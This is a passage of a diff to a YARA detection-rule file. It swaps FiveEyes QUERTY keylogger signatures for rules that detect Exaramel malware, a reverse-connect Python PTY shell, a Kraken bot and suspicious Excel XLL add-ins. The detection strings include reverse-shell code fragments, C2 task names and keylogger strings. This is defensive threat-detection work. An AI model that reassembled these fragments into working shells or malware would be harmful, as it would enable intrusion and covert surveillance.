-		$s7 = "<pluginConfig>" fullword ascii
-		$s8 = "</platform>" fullword ascii
-		$s9 = "</lpConfig>" fullword ascii
-		$s10 = "<lpConfig>" fullword ascii
+		$ = /\{"Hosts":\[".{10,512}"\],"Proxy":".{0,512}","Version":".{1,32}","Guid":"/
 
 	condition:
-		9 of them
+		all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20123_Sys
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_File_Ciphertext
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0d0e3642-f5d4-59b2-8e56-a7c999e34775"
-		date = "2015-01-18"
-		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L28-L45"
+		description = "Detects contents of the configuration file used by Exaramel (encrypted with key odhyrfjcnfkdtslt, sample e1ff72[...]"
+		author = "FR/ANSSI/SDO"
+		id = "763dbb17-2bad-5b40-8a7b-b71bc5849cd9"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L120-L132"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
-		logic_hash = "881af0e2ff8fad2bca2ae05ad63b5185356181685daafa7a1b9992a1de017c9e"
-		score = 75
+		logic_hash = "9dc7ee5b0a218a2b5be652e137fa090c944c3ddb0f699f521a72896668210813"
+		score = 80
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "20123.dll" fullword ascii
-		$s1 = "kbdclass.sys" fullword wide
-		$s2 = "IoFreeMdl" fullword ascii
-		$s3 = "ntoskrnl.exe" fullword ascii
-		$s4 = "KfReleaseSpinLock" fullword ascii
+		$ = { 6F B6 08 E9 A3 0C 8D 5E DD BE D4 }
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20123_Cmddef
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Socket_Path
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
-		author = "Florian Roth (Nextron Systems)"
-		id = "88a29288-9db5-5437-9efe-cdb823a2b928"
-		date = "2015-01-18"
-		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L47-L80"
+		description = "Detects path of the unix socket created to prevent concurrent executions in Exaramel malware"
+		author = "FR/ANSSI/SDO"
+		id = "3aab84c9-9748-5d11-9cd7-efa9151036cf"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L134-L146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
-		logic_hash = "84776764caa79ad68f2dd0d2f890821c75f2efba7c46d674110ba870a40a372a"
-		score = 75
-		quality = 83
+		logic_hash = "8c049b5a7b508ca0f160d166f3c726e4a23a2c5b3105d075d7bf7a301a1c58f6"
+		score = 80
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii
-		$s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
-		$s2 = "<commands/>" fullword ascii
-		$s3 = "</version>" fullword ascii
-		$s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
-		$s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
-		$s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
-		$s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
-		$s8 = "<dllDepend>None</dllDepend>" fullword ascii
-		$s9 = "<minorType>0</minorType>" fullword ascii
-		$s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
-		$s11 = "</comments>" fullword ascii
-		$s12 = "<comments>" fullword ascii
-		$s13 = "<majorType>1</majorType>" fullword ascii
-		$s14 = "<files>None</files>" fullword ascii
-		$s15 = "<poc>Erebus</poc>" fullword ascii
-		$s16 = "</plugin>" fullword ascii
-		$s17 = "<team>None</team>" fullword ascii
-		$s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
-		$s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
-		$s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
+		$ = "/tmp/.applocktx"
 
 	condition:
-		14 of them
+		all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20121_Dll
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Task_Names
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a0dc146c-85fd-55b8-a5e0-bfc1f406507e"
-		date = "2015-01-18"
-		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L82-L96"
+		description = "Detects names of the tasks received from the CC server in Exaramel malware"
+		author = "FR/ANSSI/SDO"
+		id = "185f2f3b-bf5c-54af-bca2-400d08bf9c91"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L148-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "89504d91c5539a366e153894c1bc17277116342b"
-		logic_hash = "e735a7c26652cbf2bccac80a14568a3582b254ae25e2db56a46c09a714650611"
-		score = 75
+		logic_hash = "193482da1e2b9509fa9c65d46edc56057f7b5d44b7408d918d4a9cbb60736dab"
+		score = 80
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
-		$s1 = "20121.dll" fullword ascii
+		$ = "App.Delete"
+		$ = "App.SetServer"
+		$ = "App.SetProxy"
+		$ = "App.SetTimeout"
+		$ = "App.Update"
+		$ = "IO.ReadFile"
+		$ = "IO.WriteFile"
+		$ = "OS.ShellExecute"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20123
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Struct
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20123.xml"
-		author = "Florian Roth (Nextron Systems)"
-		id = "718d80c9-b6bb-5b73-9c17-49e7d6f77210"
-		date = "2015-01-18"
-		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L97-L121"
+		description = "Detects the beginning of type _type struct for some of the most important structs in Exaramel malware"
+		author = "FR/ANSSI/SDO"
+		id = "8282e485-966c-554d-8e41-70dc1657f5ea"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L169-L185"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
-		logic_hash = "918462399af78b16a8214ceb1d39db554e3136efd4bc643353f0727e4a162516"
-		score = 75
+		logic_hash = "312d0598fa85837f94023036468fcae50e8b2de532430a944befa8090afe79f6"
+		score = 80
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
-		$s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
-		$s2 = "<name>20123.sys</name>" fullword ascii
-		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
-		$s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
-		$s5 = "<platform type=\"1\">" fullword ascii
-		$s6 = "</plugin>" fullword ascii
-		$s7 = "</pluginConfig>" fullword ascii
-		$s8 = "<pluginConfig>" fullword ascii
-		$s9 = "</platform>" fullword ascii
-		$s10 = "</lpConfig>" fullword ascii
-		$s11 = "<lpConfig>" fullword ascii
+		$struct_le_config = {70 00 00 00 00 00 00 00 58 00 00 00 00 00 00 00 47 2d 28 42 0? [2] 19}
+		$struct_le_worker = {30 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 46 6a 13 e2 0? [2] 19}
+		$struct_le_client = {20 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 7b 6a 49 84 0? [2] 19}
+		$struct_le_report = {30 00 00 00 00 00 00 00 28 00 00 00 00 00 00 00 bf 35 0d f9 0? [2] 19}
+		$struct_le_task = {50 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 88 60 a1 c5 0? [2] 19}
 
 	condition:
-		9 of them
+		any of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20120_Dll
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Strings_Typo
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d23ac7bf-3e0c-5b59-a9dc-1ae0a4ae9c02"
-		date = "2015-01-18"
-		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L123-L156"
+		description = "Detects misc strings in Exaramel malware with typos"
+		author = "FR/ANSSI/SDO"
+		id = "fdc79b87-eb9e-5751-9474-ff653b073165"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L187-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
-		logic_hash = "fc3aac33c84d3b4a981c2d1a9358c54dc5ceca2017dbf2e2a51e1b6970b90796"
-		score = 75
-		quality = 83
+		logic_hash = "65e6de743eb9fc742674c7e54eef8a376963a6fd4380bacd03fe6f92d4235920"
+		score = 80
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" wide
-		$s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" wide
-		$s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii
-		$s3 = "- Log Used (number of windows) - %d" fullword wide
-		$s4 = "- Log Limit (number of windows) - %d" fullword wide
-		$s5 = "Process or User Default Language" fullword wide
-		$s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide
-		$s7 = "- Logging of keystrokes is switched ON" fullword wide
-		$s8 = "- Logging of keystrokes is switched OFF" fullword wide
-		$s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
-		$s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide
-		$s11 = "FAILED to get Qwerty Status" fullword wide
-		$s12 = "- Successfully retrieved Log from Implant." fullword wide
-		$s13 = "- Logging of all Windows is toggled ON" fullword wide
-		$s14 = "- Logging of all Windows is toggled OFF" fullword wide
-		$s15 = "Qwerty FAILED to retrieve window list." fullword wide
-		$s16 = "- UNSUCCESSFUL Log Retrieval from Implant." fullword wide
-		$s17 = "The implant failed to return a valid status" fullword ascii
-		$s18 = "- Log files were NOT generated!" fullword wide
-		$s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide
-		$s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide
+		$typo1 = "/sbin/init | awk "
+		$typo2 = "Syslog service for monitoring \n"
+		$typo3 = "Error.Can't update app! Not enough update archive."
+		$typo4 = ":\"metod\""
 
 	condition:
-		10 of them
+		3 of ( $typo* )
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20120_Cmddef
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Strings
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dfa0693e-4e4c-59c8-9e51-e221aefd8662"
-		date = "2015-01-18"
-		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L158-L191"
+		description = "Detects Strings used by Exaramel malware"
+		author = "FR/ANSSI/SDO (composed from 4 saparate rules by Florian Roth)"
+		id = "fdc79b87-eb9e-5751-9474-ff653b073165"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L204-L232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
-		logic_hash = "9c336a09adb5fdf3149e5d0ad716cb854f95effa4ce4dfe3e75f43031e4903ff"
-		score = 75
-		quality = 83
+		logic_hash = "9d2790e60184ed973b2735263d0a997f32af0beacc9ea8ef65926fe6507011d5"
+		score = 80
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "This PPC gets the current keystroke log." fullword ascii
-		$s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
-		$s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
-		$s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
-		$s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
-		$s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
-		$s6 = "<name>Get Keystroke Log</name>" fullword ascii
-		$s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
-		$s8 = "<definition>display help for this function</definition>" fullword ascii
-		$s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
-		$s10 = "Set the log limit (in number of windows)" fullword ascii
-		$s11 = "<example>qwgetlog</example>" fullword ascii
-		$s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
-		$s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
-		$s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii
-		$s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
-		$s16 = "<command id=\"32\">" fullword ascii
-		$s17 = "<command id=\"3\">" fullword ascii
-		$s18 = "<command id=\"7\">" fullword ascii
-		$s19 = "<command id=\"1\">" fullword ascii
-		$s20 = "<command id=\"4\">" fullword ascii
+		$persistence1 = "systemd"
+		$persistence2 = "upstart"
+		$persistence3 = "systemV"
+		$persistence4 = "freebsd rc"
+		$report1 = "systemdupdate.rep"
+		$report2 = "upstartupdate.rep"
+		$report3 = "remove.rep"
+		$url1 = "/tasks.get/"
+		$url2 = "/time.get/"
+		$url3 = "/time.set"
+		$url4 = "/tasks.report"
+		$url5 = "/attachment.get/"
+		$url6 = "/auth/app"
 
 	condition:
-		10 of them
+		(5 of ( $url* ) and all of ( $persistence* ) ) or ( all of ( $persistence* ) and all of ( $report* ) ) or ( 5 of ( $url* ) and all of ( $report* ) )
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20120
+rule SIGNATURE_BASE_HKTL_Reverse_Connect_TCP_PTY_Shell : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20120.xml"
-		author = "Florian Roth (Nextron Systems)"
-		id = "503c71de-1bc5-5690-944c-a60917a4da09"
-		date = "2015-01-18"
+		description = "Detects reverse connect TCP PTY shell"
+		author = "Jeff Beley"
+		id = "a9a90d67-774b-5b32-97c0-d7e06763f2e9"
+		date = "2019-10-19"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L193-L216"
+		reference = "https://github.com/infodox/python-pty-shells/blob/master/tcp_pty_backconnect.py"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_python_pty_shell.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "597082f05bfd3225587d480c30f54a7a1326a892"
-		logic_hash = "7d2617e0ee41ea475608757594cba8ae93f2dbb09b5d01d1fa3324b32ebb8aa0"
+		logic_hash = "6b92077f9ff775ae3f8166f47a32aaa872fcbf7fcefc3789e5411388aac5403a"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "cae9833292d3013774bdc689d4471fd38e4a80d2d407adf9fa99bc8cde3319bf"
 
 	strings:
-		$s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
-		$s1 = "<name>20120.dll</name>" fullword ascii
-		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
-		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
-		$s4 = "<platform type=\"1\">" fullword ascii
-		$s5 = "</plugin>" fullword ascii
-		$s6 = "</pluginConfig>" fullword ascii
-		$s7 = "<pluginConfig>" fullword ascii
-		$s8 = "</platform>" fullword ascii
-		$s9 = "</lpConfig>" fullword ascii
-		$s10 = "<lpConfig>" fullword ascii
+		$s1 = "os.dup2(s.fileno(),1)" fullword ascii
+		$s2 = "pty.spawn(\"/bin/\")" fullword ascii
+		$s3 = "os.putenv(\"HISTFILE\",'/dev/null')" fullword ascii
+		$s4 = "socket.socket(socket.AF_INET, socket.SOCK_STREAM)" fullword ascii
 
 	condition:
-		all of them
+		filesize < 1KB and 2 of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20121_Cmddef
+rule SIGNATURE_BASE_Kraken_Bot_Sample : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
+		description = "Kraken Bot Sample - file inf.bin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2deb73f7-372e-5d29-a077-431ab1967d93"
-		date = "2015-01-18"
+		id = "508bb581-9dad-5201-af3d-7da17d905dc9"
+		date = "2015-05-07"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L218-L251"
+		reference = "https://blog.gdatasoftware.com/blog/article/dissecting-the-kraken.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kraken_bot1.yar#L8-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
-		logic_hash = "d73f0e964bd57ed3a2cd782ac204a2b82a9b334e33d64dc61e6414654d7c38d3"
-		score = 75
-		quality = 83
-		tags = ""
+		hash = "798e9f43fc199269a3ec68980eb4d91eb195436d"
+		logic_hash = "2e0f0a981ce3483aad8e48f6a259f9875ea4f8449feb24bafbae07243dd82a16"
+		score = 90
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
-		$s1 = "<message>Failed to get File Time</message>" fullword ascii
-		$s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
-		$s3 = "<message>Failed to set File Time</message>" fullword ascii
-		$s4 = "</commands>" fullword ascii
-		$s5 = "<commands>" fullword ascii
-		$s6 = "</version>" fullword ascii
-		$s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
-		$s8 = "<message>No Comms. with Driver</message>" fullword ascii
-		$s9 = "</error>" fullword ascii
-		$s10 = "<message>Invalid File Size</message>" fullword ascii
-		$s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
-		$s12 = "<message>File Size Mismatch</message>" fullword ascii
-		$s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
-		$s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
-		$s15 = "<dllDepend>None</dllDepend>" fullword ascii
-		$s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
-		$s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
-		$s18 = "<minorType>0</minorType>" fullword ascii
-		$s19 = "<code>00001002</code>" fullword ascii
-		$s20 = "<code>00001001</code>" fullword ascii
+		$s2 = "%s=?getname" fullword ascii
+		$s4 = "&COMPUTER=^" fullword ascii
+		$s5 = "xJWFwcGRhdGElAA=" fullword ascii
+		$s8 = "JVdJTkRJUi" fullword ascii
+		$s20 = "btcplug" fullword ascii
 
 	condition:
-		12 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Duqu1_5_Modules
+
+rule SIGNATURE_BASE_Gen_Excel_Xll_Addin_Suspicious : FILE
 {
 	meta:
-		description = "Detection for Duqu 1.5 modules"
-		author = "Silas Cutler (havex@chronicle.security)"
-		id = "7239f5e1-c08f-566c-8998-f7dacc2c4a29"
-		date = "2019-04-09"
+		description = "Detects suspicious XLL add-ins to Excel"
+		author = "@JohnLaTwC"
+		id = "013db759-ab9d-5505-933b-bda702a0941e"
+		date = "2020-10-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu1_5_modules.yar#L2-L17"
+		reference = "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_excel_xll_addin_suspicious.yar#L3-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bb3961e2b473c22c3d5939adeb86819eb846ccd07f5736abb5e897918580aace"
-		logic_hash = "795107e227cfb73f6ea09fcdb078f8b57a30d47a2cb702b2d47cc936dea5ae9f"
-		score = 75
+		logic_hash = "d8c3f00ef05b0b84e4c4d655d01eab6f6e67714619695fd1433726e5a940e530"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "0bad4e4bc5093dcfc2737c4d8be89d6f093509a7b91a1e022050cb890d90e4e0"
+		hash2 = "133e47eedfede46d1a4529ce7f047e09521ed8c7cad2e49d3522064695bd6c43"
+		hash3 = "1994a39d5639b4eea5c3cdf084a8eacf8610a96702e580d88a6ec18887d0ec6b"
+		hash4 = "28f45d01e397841fcba48da1e61e4927f42ff6fe6f32595c23cf9a953cd2658a"
+		hash5 = "54c3598cf22ad64faeb4e0f9f70e026a1ae834a8c06e5187bf289bb3ee43a8ec"
+		hash6 = "5644a04513744edfb247d0ea83e3e2f7d616d6752cfd1af50e866bb0270131ee"
+		hash7 = "836c0d21fc3ea3a8ce1a493097a5034d110e5c50bfd7e6c3dcb674dc7a6a19ec"
+		hash8 = "b926f7db36bc5bae73091c783b0715d2af051de22a579548adf2498cb1a1d075"
+		hash9 = "6ba100a5da5efea14a5ca929628b732a6e6b8ab8f78167db35343e895997ce52"
+		hasha = "ee603cbd6187850334ae5d8adcf029d5cde710fc966b2b7a2c95249d3b23d693"
+		hashb = "99195679e998407fd4d606a0d956bda99f79625b638c63f90d9d399c6f2a143e"
+		hashc = "99534c7086128998ae39967fe5fc6bf526cb2ba5d3b2e99dc7bd03833e4a94ae"
 
 	strings:
-		$c1 = "%s(%d)disk(%d)fdisk(%d)"
-		$c2 = "\\Device\\Floppy%d" wide
-		$c3 = "BrokenAudio" wide
-		$m1 = { 81 3F E9 18 4B 7E}
-		$m2 = { 81 BC 18 F8 04 00 00 B3 20 EA B4 }
+		$s1 = "CryptStringToBinaryA"
+		$s2 = "NtQueueApcThread"
+		$cs1 = "dsrole.dll"
+		$cs2 = "user32.dll"
+		$debug = "SeDebugPrivilege"
 
 	condition:
-		all of them
+		filesize < 1MB and uint16( 0 ) == 0x5a4d and pe.characteristics & pe.DLL and pe.exports ( "xlAutoOpen" ) and ( ( ( pe.imports ( "KERNEL32.dll" , "LookupPrivilegeValueW" ) or pe.imports ( "KERNEL32.dll" , "LookupPrivilegeValueA" ) ) and pe.imports ( "KERNEL32.dll" , "AdjustTokenPrivileges" ) and pe.imports ( "KERNEL32.dll" , "OpenProcess" ) and $debug ) or ( pe.imports ( "ADVAPI32.dll" , "CryptDecrypt" ) and pe.imports ( "ADVAPI32.dll" , "CryptImportKey" ) ) or ( pe.imports ( "DNSAPI.dll" , "DnsQuery_A" ) or pe.imports ( "DNSAPI.dll" , "DnsQuery_W" ) ) or ( ( pe.imports ( "KERNEL32.dll" , "FindResourceA" ) or pe.imports ( "KERNEL32.dll" , "FindResourceW" ) ) and pe.imports ( "KERNEL32.dll" , "LoadResource" ) and pe.imports ( "KERNEL32.dll" , "LockResource" ) and ( pe.imports ( "KERNEL32.dll" , "VirtualAlloc" ) or pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) ) and pe.imports ( "KERNEL32.dll" , "WriteProcessMemory" ) and pe.imports ( "KERNEL32.dll" , "SetThreadContext" ) ) or ( pe.imports ( "KERNEL32.dll" , "GetThreadContext" ) and pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) and pe.imports ( "KERNEL32.dll" , "ResumeThread" ) and pe.imports ( "KERNEL32.dll" , "SetThreadContext" ) ) or ( pe.imports ( "KERNEL32.dll" , "WinExec" ) ) or ( all of ( $s* ) ) or ( all of ( $cs* ) and pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) and pe.imports ( "KERNEL32.dll" , "TerminateProcess" ) and pe.imports ( "KERNEL32.dll" , "Sleep" ) ) )
 }
-rule SIGNATURE_BASE_Gen_Exploit_CVE_2017_10271_Weblogic : HIGHVOL CVE_2017_10271 FILE
+rule SIGNATURE_BASE_Persistence_Agent_Macos : FILE
 {
 	meta:
-		description = "Exploit for CVE-2017-10271 (Oracle WebLogic)"
+		description = "Detects a Python agent that establishes persistence on macOS"
 		author = "John Lambert @JohnLaTwC"
-		id = "e30e316f-1ebb-5c38-ba25-d2a9d0083a03"
-		date = "2018-03-21"
+		id = "9c69af3c-ee85-58ac-8b78-66760addc117"
+		date = "2018-02-24"
 		modified = "2023-12-05"
-		reference = "https://github.com/c0mmand3rOpSec/CVE-2017-10271, https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_exploit_cve_2017_10271_weblogic.yar#L1-L26"
+		reference = "https://ghostbin.com/paste/mz5nf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_osx_pyagent_persistence.yar#L1-L40"
